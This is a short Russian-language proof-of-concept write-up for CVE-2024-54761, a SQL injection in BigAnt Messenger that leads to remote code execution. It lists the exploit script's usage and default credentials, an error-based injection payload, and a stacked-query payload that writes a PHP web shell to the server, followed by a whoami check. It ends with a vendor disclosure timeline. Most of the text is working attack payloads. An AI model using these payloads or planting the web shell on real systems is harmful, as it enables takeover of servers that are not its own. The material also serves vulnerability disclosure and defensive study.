
CVE-2024-54761 PoC
Уязвимость SQL-инъекции в BigAnt Messenger приводит к уязвимости RCE. Следуйте шагам для эксплуатации.
Usage:
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
-h, --help показать это справочное сообщение и выйти
-r, --rhost RHOST IP-адрес цели
-p, --rport RPORT Порт цели (по умолчанию 8000)
-u, --username USERNAME
Имя пользователя для входа (по умолчанию admin)
-P, --password PASSWORD
Пароль для входа (по умолчанию 123456)
Запустите эксплойт с учётными данными по умолчанию.
python CVE-2024-54761.py -r 127.0.0.1
Извлеките версию базы данных с помощью параметра dev_code, подверженного SQLi.
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
Загрузите PHP-веб-шелл на цель с помощью стековых запросов SQL.
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
Подтверждение выполнения команды:
/shell.php?cmd=whoami

31-10-2024: Отправлены уязвимости вендору по электронной почте
31-10-2024: Направлено письмо вендору, ответа не получено
15-11-2024: Направлено письмо вендору, ответа не получено
15-11-2024: Запрошены CVE
https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com